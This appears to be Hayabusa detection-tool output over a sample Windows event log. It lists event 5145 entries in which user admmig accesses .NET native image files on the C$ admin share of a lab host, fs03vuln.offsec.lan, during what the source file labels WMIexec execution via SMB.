2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
